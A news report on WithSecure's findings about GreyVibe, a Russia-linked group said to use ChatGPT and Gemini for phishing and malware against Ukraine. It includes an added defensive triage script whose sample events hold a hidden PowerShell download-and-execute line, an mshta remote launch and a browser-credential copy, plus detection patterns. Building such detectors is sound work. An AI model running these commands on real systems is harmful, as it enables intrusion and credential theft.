Russia-linked hackers used ChatGPT, Gemini to attack Ukrainian targets

  • WithSecure published research documenting GreyVibe, a Russia-linked group using ChatGPT, Gemini, and Ideogram AI to build phishing lures and custom malware targeting Ukraine. [bleepingcomputer]
  • The group ran five campaigns, including honeytrap dating sites, fake CAPTCHAs leading to real Zoom calls, and spoofed military portals, to compromise soldiers and officials. [bleepingcomputer]
  • Researchers said GreyVibe appears to be hired by Russia’s government rather than part of it, showing how AI lets lower-skill actors scale sophisticated operations. [bleepingcomputer]

Russia-Linked GreyVibe Uses ChatGPT and Gemini to Scale Cyberattacks on Ukraine

A previously unknown threat group with ties to Russia has been leveraging generative AI tools across every phase of its cyberattack operations against Ukrainian targets, according to new research published this week by cybersecurity firm WithSecure.

AI-Powered Espionage

The group, tracked as GreyVibe, has been active since at least August 2025 and targets Ukrainian military, government, civilian, and business organizations, WithSecure said in a report published on May 27. Researchers discovered the activity in January 2026 and found that the group uses OpenAI’s ChatGPT, Google Gemini, and Ideogram AI to generate phishing lures, build fake websites, develop custom malware, and create post-compromise tooling. [bleepingcomputer]

The link to Russia is supported by malware panels written in Russian, comments in code artifacts, and command-and-control servers configured to Moscow time (UTC+3), though WithSecure stopped short of classifying it as a formal nation-state operation. [bleepingcomputer]

Five Campaign Chains

WithSecure documented five distinct attack campaigns. PhantomMail uses spear-phishing emails with malicious archives disguised as Ukrainian government and energy documents. PhantomClick deploys fake CAPTCHA pages that trick victims into running self-infecting commands, then redirects them to legitimate Zoom meetings so they never suspect compromise. PrincessClub — perhaps the most elaborate — uses fake adult dating websites and Telegram personas to lure Ukrainian military personnel into installing spyware, including live video calls with real people to build trust. [itmedia]

Two additional campaigns, DroneLink and Nebo, use fake Ukrainian military charity sites and spoofed Russian military login portals, respectively. [bleepingcomputer]

The group deploys custom malware including LegionRelay and PhantomRelay, both PowerShell-based remote access trojans likely developed with AI assistance. LegionRelay can steal files, capture screenshots, exfiltrate browser credentials and messaging data from Telegram and WhatsApp, and set up remote desktop access. On Android devices, the group uses FallSpy spyware to harvest contacts, call logs, location data, and media files. [bleepingcomputer]
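Two of the behaviours described above leave a recognisable trace in endpoint process-creation telemetry: the PhantomClick pattern, where a user pastes a "CAPTCHA fix" command into the Run dialog so that explorer.exe spawns a hidden or encoded PowerShell, and the PowerShell-based RATs reading browser and messenger credential stores. The triage script below is an added example written for this page, not code from WithSecure or from the report; the event field names (loosely modelled on Sysmon Event ID 1), the sample events and the hostnames are all constructed, and the regex heuristics are an assumption about what such activity typically looks like rather than indicators taken from the research.

```python
"""Heuristic triage of process-creation events for two behaviours the
article describes (added example; field names and samples are constructed)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


# Interpreters a user would launch by pasting into the Run dialog.
USER_LAUNCHED_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe",
                              "cmd.exe", "wscript.exe", "cscript.exe"}

# Arguments that a pasted "verification" command typically carries:
# hidden window, base64-encoded payload, or a download-and-execute cradle.
PASTED_COMMAND_ARGS = [
    re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"(?:invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b)", re.I),
    re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
]

# Credential/messaging stores the article says the implants exfiltrate.
# Paths are assumptions about common install locations, not IoCs from the report.
CREDENTIAL_STORE_PATHS = [
    re.compile(r"\\User Data\\[^\\]+\\Login Data", re.I),   # Chromium-based browsers
    re.compile(r"\\Telegram Desktop\\tdata", re.I),
    re.compile(r"\\WhatsApp\\", re.I),
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return a list of human-readable findings for one event (empty if benign)."""
    findings = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)

    # Finding 1: interpreter launched directly by the shell (Run dialog / Win+R)
    # with arguments that look like a pasted fake-CAPTCHA command.
    if image in USER_LAUNCHED_INTERPRETERS and parent == "explorer.exe":
        if any(p.search(ev.command_line) for p in PASTED_COMMAND_ARGS):
            findings.append(f"user-launched {image} with hidden/encoded/download arguments")

    # Finding 2: PowerShell touching browser or messenger credential stores,
    # consistent with the LegionRelay capabilities described in the article.
    if image in {"powershell.exe", "pwsh.exe"}:
        if any(p.search(ev.command_line) for p in CREDENTIAL_STORE_PATHS):
            findings.append("PowerShell accessing browser/messenger credential store")

    return findings


def triage(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev))]


# Constructed sample telemetry; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "iex (iwr http://example.invalid/verify)"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell Get-ChildItem ~\Documents"),                       # benign admin use
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'Copy-Item "C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data" $env:TEMP'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"-NoProfile -File C:\ProgramData\inventory.ps1"),             # scheduled task, not user-launched
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta https://example.invalid/captcha.hta"),
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(findings))
```

Running it flags events 0, 2 and 4 and leaves the two benign PowerShell launches alone. The parent-process check is what keeps the first heuristic usable in practice: hidden or encoded PowerShell spawned by a scheduler or management agent is routine, whereas the same arguments on a process the user started from the shell are rare enough to review by hand.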

Cybercriminal Roots, State-Aligned Mission

Despite operating in line with Russian state interests, GreyVibe “lacked the level of sophistication and operational discipline typically associated with mature nation-state actors,” WithSecure noted. Some evidence ties the group to former TrickBot cybercriminals who targeted Ukraine at the start of Russia’s invasion, and the operators deployed cryptocurrency miners on some victim machines — unusual for state-backed groups. [bleepingcomputer]

WithSecure’s Christine Bejerasco said the firm believes GreyVibe is “hired by” the Russian government rather than being part of it directly. The group remains active, with campaigns observed as recently as April 2026, and its members are still unidentified. Researchers said GreyVibe represents a clear example of how generative AI allows lower-skill actors to “punch above their weight” — accelerating operations and complicating attribution across multiple stages of the attack lifecycle. [linkedin]
